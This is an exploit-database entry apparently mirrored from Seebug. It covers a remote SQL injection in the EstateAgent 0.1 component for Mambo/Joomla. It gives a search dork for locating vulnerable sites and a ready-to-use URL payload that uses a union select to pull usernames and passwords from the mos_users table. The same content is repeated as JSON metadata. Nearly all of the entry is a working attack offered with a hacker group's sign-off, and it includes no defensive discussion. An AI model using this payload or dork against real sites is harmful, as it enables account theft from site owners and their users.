Search...

Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability

2008-01-31T00:00:00

ID SSV:8027
Type seebug
Reporter Root
Modified 2008-01-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #########################################################################
#
#&nbsp;joomla&nbsp;SQL&nbsp;Injection(com_estateagent)
#
#########################################################################
#
#&nbsp;AUTHOR&nbsp;:&nbsp;S@BUN
#
#&nbsp;HOME&nbsp;:&nbsp;http://www.hackturkiye.com/

#########################################################################
#
#&nbsp;DorK&nbsp;1&nbsp;:&nbsp;allinurl:&nbsp;allinurl:&nbsp;&quot;com_estateagent&quot;
#
########################################################################
EXPLOIT&nbsp;:

index.php?option=com_estateagent&amp;Itemid=S@BUN&amp;func=showObject&amp;info=contact&amp;objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&amp;results=S@BUN

#########################################################################
#&nbsp;S@BUN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;www.hackturkiye.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;S@BUN
#########################################################################
#&nbsp;S@BUN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GOOD&nbsp;LUCKY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;S@BUN
#########################################################################&nbsp;

&lt;name&gt;EstateAgent&lt;/name&gt;
&lt;creationDate&gt;17.08.2004&lt;/creationDate&gt;
&lt;author&gt;Darko&nbsp;Selesi&lt;/author&gt;
	&lt;copyright&gt;
This&nbsp;component&nbsp;is&nbsp;released&nbsp;under&nbsp;the&nbsp;GNU/GPL&nbsp;License
&lt;/copyright&gt;
&lt;authorEmail&gt;e.agent@frame-works.de&lt;/authorEmail&gt;
&lt;authorUrl&gt;mambo.frame-works.de&lt;/authorUrl&gt;
&lt;version&gt;0.1&lt;/version&gt;
&lt;description&gt;EstateAgent&nbsp;component&nbsp;for&nbsp;Mambo&nbsp;4.5.x&lt;/description&gt;

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-8027", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-01-31T00:00:00", "title": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8027", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-01-31T00:00:00", "sourceData": "\n #########################################################################\r\n#\r\n# joomla SQL Injection(com_estateagent)\r\n#\r\n#########################################################################\r\n#\r\n# AUTHOR : S@BUN\r\n#\r\n# HOME : http://www.hackturkiye.com/\r\n\r\n#########################################################################\r\n#\r\n# DorK 1 : allinurl: allinurl: "com_estateagent"\r\n#\r\n########################################################################\r\nEXPLOIT :\r\n\r\nindex.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN\r\n\r\n#########################################################################\r\n# S@BUN                      www.hackturkiye.com                   S@BUN\r\n#########################################################################\r\n# S@BUN                         GOOD LUCKY                          S@BUN\r\n######################################################################### \r\n\r\n<name>EstateAgent</name>\r\n<creationDate>17.08.2004</creationDate>\r\n<author>Darko Selesi</author>\r\n\t<copyright>\r\nThis component is released under the GNU/GPL License\r\n</copyright>\r\n<authorEmail>e.agent@frame-works.de</authorEmail>\r\n<authorUrl>mambo.frame-works.de</authorUrl>\r\n<version>0.1</version>\r\n<description>EstateAgent component for Mambo 4.5.x</description>\n ", "id": "SSV:8027", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:48:37", "reporter": "Root", "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645567475}}